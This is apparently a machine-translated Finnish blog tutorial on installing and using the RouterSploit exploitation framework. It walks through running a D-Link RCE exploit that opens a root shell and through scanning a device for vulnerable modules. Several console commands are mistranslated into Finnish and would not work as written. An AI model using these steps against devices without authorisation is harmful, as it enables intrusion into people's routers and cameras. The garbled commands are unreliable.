Koti » Linux-työkalut » RouterSploit – Exploitation Framework Complete Tutorial [2020]

RouterSploit – Exploitation Framework Complete Tutorial [2020]

kirjoittaja Suyash
routersploit

RouterSploit on hämmästyttävä hyödyntämiskehys, joka on tehty erityisesti sulautetuille laitteille.

Pentester voi käyttää tätä työkalua kameroiden ja reitittimien turvallisuuden tarkistamiseen.

RouterSploit Highlights:

  • Koodattu Pythonissa.
  • Komentorivikäyttöliittymä.
  • Docker-tuki.
  • Modulaariset työkalut.

Tuettu käyttöjärjestelmä:

  1. Mac käyttöjärjestelmä.
  2. Linux.
  3. Android-puhelin.
  4. Windows.

RouterSploitin asentaminen:

Vaatimukset:

  • tulevaisuutta
  • pyynnöt
  • paramiko
  • pysnmp
  • pycrypto

Valinnainen:

  • sininen – bluetooth vähän energiaa

Asennus Kali Linuxiin:

Noudata alla olevia komentoja:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy -tuki:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Asennus Ubuntuun:

Noudata alla olevia komentoja:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy -tuki:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Asennus MacOS:ään:

Noudata alla olevia komentoja:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Asennus Dockeriin:

Noudata alla olevia komentoja:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Kuinka päivittää RouterSploit?

Sinun on päivitettävä RouterSploit usein hankaluuksien välttämiseksi.

Uusia moduuleja toimitetaan lähes joka päivä.

cd routersploit
git pull

RouterSploitin käyttäminen?

Käyttö

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Hyödyntäminen Framework for    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Kotisivu   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Skannerit: 4 Creds: 165 Yleinen: 4 Hyötykuormat: 32 Enkooderit: 6

rsf >

Hyökkäykset:

Edistää hyväksikäyttöä, valitse vain moduuli ja aseta tavoite:

rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Täydennä sarkainnäppäintä.

Vaihtoehtojen näyttäminen, tyyppishow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Nimi Nykyiset asetukset Kuvaus                                
   ----       ----------------     -----------                                
   kohde Kohdeosoite esim. http://192.168.1.1     
   portti       80                   Kohdeportti

Käyttäärun taiexploit komento hyödyntää kohdetta:

rsf (D-LINK DIR-300 & DIR-600 RCE) > juosta
[+] Kohde on haavoittuvainen
[*] Kutsutaan komentosilmukkaa...
cmd > whoami
root

Vaihtoehtojen asettaminen:

rsf (D-LINK DIR-300 & DIR-600 RCE) > aseta tavoite http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

On mahdollista tarkistaa, onko kohde alttiina tietylle hyväksikäytölle:

rsf (D-LINK DIR-300 & DIR-600 RCE) > tarkistaa
[+] Kohde on haavoittuvainen

Juostashow info näyttääksesi tietoja hyväksikäytöstä.

Haavoittuvien kohteiden etsiminen:

Skannerit mahdollistavat nopean varmistuksen, onko kohde alttiina hyväksikäytölle.

Käytä samoja komentoja vaihtoehtojen näyttämiseen/asettamiseksi, ja myös juosta.

rsf (D-Link skanneri) > juosta
[+] exploits/dlink/dwr_932_info_disclosure on haavoittuvainen
[-] exploits/dlink/dir_300_320_615_auth_bypass ei ole haavoittuvainen
[-] exploits/dlink/dsl_2750b_info_disclosure ei ole haavoittuvainen
[-] exploits/dlink/dns_320l_327l_rce ei ole haavoittuvainen
[-] exploits/dlink/dir_645_password_disclosure ei ole haavoittuvainen
[-] exploits/dlink/dir_300_600_615_info_disclosure ei ole haavoittuva
[-] exploits/dlink/dir_300_600_rce ei ole haavoittuvainen

[+] Laite on haavoittuvainen!
- exploits/dlink/dwr_932_info_disclosure

Virallinen RouterSploit

Lue myös: 1337x välityspalvelin

Viimeiset sanat:

RouterSploit on mahtava työkalu käyttää.

Jos kohtaat ongelmia liittyen RouterSploit. Muista kommentoida alle. Tiimimme CSHAWK ottaa sinuun yhteyttä mahdollisimman pian.

Jätä kommentti